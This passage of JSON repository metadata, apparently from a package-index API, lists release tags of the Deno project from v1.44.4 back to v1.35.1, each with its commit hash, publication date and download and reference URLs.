/tags/v1.44.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.4/manifests"},{"name":"v1.44.3","sha":"ab2ab0f7fc4e7bda16544ef96a5e6ba114e799b5","kind":"commit","published_at":"2024-06-19T00:19:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.44.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.44.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.44.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.3/manifests"},{"name":"v1.44.2","sha":"9ca1320746072001feab9f6a26e9c1518609bd7b","kind":"commit","published_at":"2024-06-13T00:51:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.44.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.44.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.44.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.2/manifests"},{"name":"v1.44.1","sha":"e02a32be2797f7c107d19da8bf2aff5bbcd97bad","kind":"commit","published_at":"2024-06-05T23:05:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.44.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.44.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.44.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.1/manifests"},{"name":"v1.44.0","sha":"f3ffffc682604349b96dbe4ad33daa5dd1a09f63","kind":"commit","published_at":"2024-05-30T05:58:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.44.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.44.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.44.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.0/manifests"},{"name":"v1.43.6","sha":"7df3d5aeec14f24e5fdec1e1e6f5739f1fbeebbe","kind":"commit","published_at":"2024-05-21T23:34:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.6","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.6/manifests"},{"name":"v1.43.5","sha":"a13c4531fd2c08617767cc8a0788b9e20ac27d45","kind":"commit","published_at":"2024-05-18T00:22:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.5/manifests"},{"name":"v1.43.4","sha":"d64921c1906ee1ac39230c16abe9ff8c546bd645","kind":"commit","published_at":"2024-05-16T23:28:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.4/manifests"},{"name":"v1.43.3","sha":"d6ad253882a6c066e0c673ff64e6554a37bb3487","kind":"commit","published_at":"2024-05-10T20:37:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.3/manifests"},{"name":"v1.43.2","sha":"acd75bbd75fdf46c213d7b21093e09349318da5d","kind":"commit","published_at":"2024-05-08T22:21:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.2/manifests"},{"name":"v1.43.1","sha":"5ff881a0737eccceed55a0ace3ef3110d5b72b2f","kind":"commit","published_at":"2024-05-01T06:46:39.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.1/manifests"},{"name":"v1.43.0","sha":"5ff881a0737eccceed55a0ace3ef3110d5b72b2f","kind":"commit","published_at":"2024-05-01T06:46:39.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.0/manifests"},{"name":"v1.42.4","sha":"7cb23c5e3ee0b6c416f4c0e34c7c63fdf5024138","kind":"commit","published_at":"2024-04-16T00:17:02.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.42.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.42.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.42.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.4/manifests"},{"name":"v1.42.3","sha":"a64a257024c9933d90494613ac6b302cc69df6fa","kind":"commit","published_at":"2024-04-12T00:54:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.42.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.42.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.42.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.3/manifests"},{"name":"v1.42.2","sha":"04c0a4cbf7c00811d3ace3184c1cb8597a0e88f1","kind":"commit","published_at":"2024-04-11T06:39:03.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.42.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.42.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.42.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.2/manifests"},{"name":"v1.42.1","sha":"08f0613b390b289d07c6ea165bed0518809b34e8","kind":"commit","published_at":"2024-04-01T06:33:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.42.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.42.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.42.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.1/manifests"},{"name":"v1.42.0","sha":"9c6eca1064de029e560377bef831e69d22c5c00b","kind":"commit","published_at":"2024-03-28T00:47:33.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.42.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.42.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.42.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.0/manifests"},{"name":"v1.41.3","sha":"0d7662e1556a60bcc4b7075752fb2c2842b1afea","kind":"commit","published_at":"2024-03-14T18:13:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.41.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.41.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.41.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.3/manifests"},{"name":"v1.41.2","sha":"6d062cf0c79158a8c0c8a136c945c3eab2af8b50","kind":"commit","published_at":"2024-03-08T07:32:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.41.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.41.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.41.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.2/manifests"},{"name":"v1.41.1","sha":"8ccb9e954548d1a4d3ccbe065c28d6067d3fda03","kind":"commit","published_at":"2024-03-01T00:25:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.41.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.41.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.41.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.1/manifests"},{"name":"v1.41.0","sha":"118445103b019fbeb50eadc8d09d450fa8c33eee","kind":"commit","published_at":"2024-02-22T01:44:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.41.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.41.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.41.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.0/manifests"},{"name":"v1.40.5","sha":"2c97831fec0d335a474c4a599a5df345a23ef036","kind":"commit","published_at":"2024-02-15T05:22:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.40.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.40.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.40.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.5/manifests"},{"name":"v1.40.4","sha":"49214d309fc373a80a02f57545131b15f7813a98","kind":"commit","published_at":"2024-02-08T11:05:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.40.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.40.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.40.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.4/manifests"},{"name":"v1.40.3","sha":"887fd59486325ad99c183955b35fec07fd45516c","kind":"commit","published_at":"2024-02-01T06:27:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.40.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.40.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.40.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.3/manifests"},{"name":"v1.40.2","sha":"9a55a72cf195b2d5cee1e8598c7d28e4b1e8013a","kind":"commit","published_at":"2024-01-26T16:36:20.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.40.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.40.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.40.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.2/manifests"},{"name":"v1.40.1","sha":"b003ecec64782ebe3aa7e5b17728df2e6a6e2e39","kind":"commit","published_at":"2024-01-25T15:22:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.40.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.40.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.40.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.1/manifests"},{"name":"v1.40.0","sha":"9e575a286269c38c1af0a918a2a4ea4639a3004b","kind":"commit","published_at":"2024-01-25T02:48:50.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.40.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.40.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.40.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.0/manifests"},{"name":"v1.39.4","sha":"be4d0b7ad306312b0c01e1abc345e54b4e589ab6","kind":"commit","published_at":"2024-01-13T23:52:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.39.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.39.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.39.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.4/manifests"},{"name":"v1.39.3","sha":"aa23ccd1ae3b0c188336c0fd1d84deaed5fe13af","kind":"commit","published_at":"2024-01-12T14:58:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.39.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.39.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.39.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.3/manifests"},{"name":"v1.39.2","sha":"6af25c0592af46781b63bd43cf12d39b8aa61d09","kind":"commit","published_at":"2024-01-04T20:40:03.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.39.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.39.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.39.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.2/manifests"},{"name":"v1.39.1","sha":"68254ddc2060c32e6daa55aa3b33f82739655705","kind":"commit","published_at":"2023-12-21T15:46:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.39.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.39.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.39.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.1/manifests"},{"name":"v1.39.0","sha":"5b96f7bf21392620f0047687ec3b75b25b7ea9f2","kind":"commit","published_at":"2023-12-13T21:52:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.39.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.39.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.39.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.0/manifests"},{"name":"v1.38.5","sha":"172e5f0a0cea97ba27f7f6e46fb8f9b31f8dbbc6","kind":"commit","published_at":"2023-12-05T22:37:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.38.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.38.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.38.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.5/manifests"},{"name":"v1.38.4","sha":"8c07f52a7cbd6117e968383c94fe25b91c4c9242","kind":"commit","published_at":"2023-11-30T19:12:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.38.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.38.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.38.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.4/manifests"},{"name":"v1.38.3","sha":"3193e93912f87dd05871abb61f54297368f3f265","kind":"commit","published_at":"2023-11-24T03:49:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.38.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.38.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.38.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.3/manifests"},{"name":"v1.38.2","sha":"118be11e8c64fd6c4afb352b5095c02fa5571e8e","kind":"commit","published_at":"2023-11-17T05:57:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.38.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.38.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.38.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.2/manifests"},{"name":"v1.38.1","sha":"0e7ad0388be7413db6ded8b60d5ae5d7cc0ffda0","kind":"commit","published_at":"2023-11-10T11:46:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.38.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.38.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.38.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.1/manifests"},{"name":"v1.38.0","sha":"41877a0b3735d52db8b4f5047b1d4d61e37ba585","kind":"commit","published_at":"2023-11-02T01:01:47.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.38.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.38.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.38.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.0/manifests"},{"name":"v1.37.2","sha":"7282994df4f9c1748affa7c4455eea46a9e1a2e0","kind":"commit","published_at":"2023-10-13T00:14:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.37.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.37.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.37.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.37.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.37.2/manifests"},{"name":"v1.37.1","sha":"72c276d61a8b43abd3dbcf4f1440a2bf133fe0d2","kind":"commit","published_at":"2023-09-27T06:24:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.37.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.37.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.37.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.37.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.37.1/manifests"},{"name":"v1.37.0","sha":"997aa604dfd50c0f0ec6fd4db16b5034d2cfd726","kind":"commit","published_at":"2023-09-19T20:29:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.37.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.37.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.37.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.37.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.37.0/manifests"},{"name":"v1.36.4","sha":"c0617d11f6391f1b1b3afffe0152c73b5989ab80","kind":"commit","published_at":"2023-09-01T14:15:50.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.36.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.36.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.36.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.4/manifests"},{"name":"v1.36.3","sha":"55029c72618323014aa49317de9124375adeb13f","kind":"commit","published_at":"2023-08-24T16:01:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.36.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.36.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.36.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.3/manifests"},{"name":"v1.36.2","sha":"a7f5244a72cc6c00949c02a180d0d9cdf2bf1672","kind":"commit","published_at":"2023-08-21T13:39:22.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.36.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.36.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.36.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.2/manifests"},{"name":"v1.36.1","sha":"9f1455b75087e9e41a995bbb6a8a7f3059a0185a","kind":"commit","published_at":"2023-08-10T10:53:54.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.36.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.36.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.36.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.1/manifests"},{"name":"v1.36.0","sha":"6ba245fe2570b29e35a4fd296a196a58870b1e3c","kind":"commit","published_at":"2023-08-03T16:26:25.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.36.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.36.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.36.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.0/manifests"},{"name":"v1.35.3","sha":"2e7254f2a60239603a2c6fea75cc71fbf6226470","kind":"commit","published_at":"2023-07-26T14:46:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.35.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.35.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.35.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.3/manifests"},{"name":"v1.35.2","sha":"60fe8aa5325345fc07c997b2dba169e45b87a863","kind":"commit","published_at":"2023-07-20T01:29:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.35.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.35.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.35.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.2/manifests"},{"name":"v1.35.1","sha":"b4824bf45f3d12e1b53e7eb5afcd49c38a575210","kind":"commit","published_at":"2023-07-12T21:49:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.35.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.35.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.35.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.1","manifests_url":"https://rep